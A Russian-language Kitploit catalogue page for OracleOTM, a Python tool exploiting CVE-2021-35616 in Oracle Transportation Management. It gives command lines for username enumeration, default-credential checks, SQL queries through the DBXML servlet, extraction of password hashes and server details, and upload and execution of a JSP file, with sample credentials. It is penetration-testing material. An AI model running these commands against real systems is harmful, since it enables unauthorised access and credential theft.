Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
OracleOTM — Python-инструмент для эксплуатации CVE-2021-35616 | Kitploit
Инструменты/GitHubGitHub/ofirhamam/oracleotm
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеБезопасность Баз Данных
GitHubofirhamam/oracleotm

OracleOTM

Python-инструмент для эксплуатации CVE-2021-35616

Репозиторий
11124 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

OracleOTM

Python-инструмент для эксплуатации CVE-2021-35616

Скрипт работает по модулям, которые я реализовал в следующем порядке:

► Перебор имен пользователей

► Поиск учетных данных по умолчанию

► Выполнение SQL-запроса через сервлет DBXML

► Полная эксплуатация и выполнение JSP

Синтаксис скрипта следующий:

.\OracleOTM.py {module} {host TXT file} {additional parameters}

Перебор имен пользователей: .\OracleOTM.py enum {hosts TXT file} -u users.txt

Поиск учетных данных по умолчанию: .\OracleOTM.py default {hosts TXT file}

Выполнение SQL-запроса через сервлет DBXML: .\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"

Я также подготовил несколько предопределенных запросов, которые счел полезными; вы можете использовать их напрямую следующим образом:

.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os

root@kitploit:~
OS – Извлечение ОС сервера 

Osuser – Извлечение пользователя ОС, запустившего БД

Hostname – Имя хоста сервера БД 

Hostip – IP-адрес сервера БД 

Passwords – Извлечение пользователей OTM и их хешированных паролей

 Oraversion – Версия БД 

Dbusershash – Хеши паролей пользователей БД

Dbfileslocation – Расположение файлов БД в ОС

Полная эксплуатация и выполнение JSP: .\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"

Скачать инструмент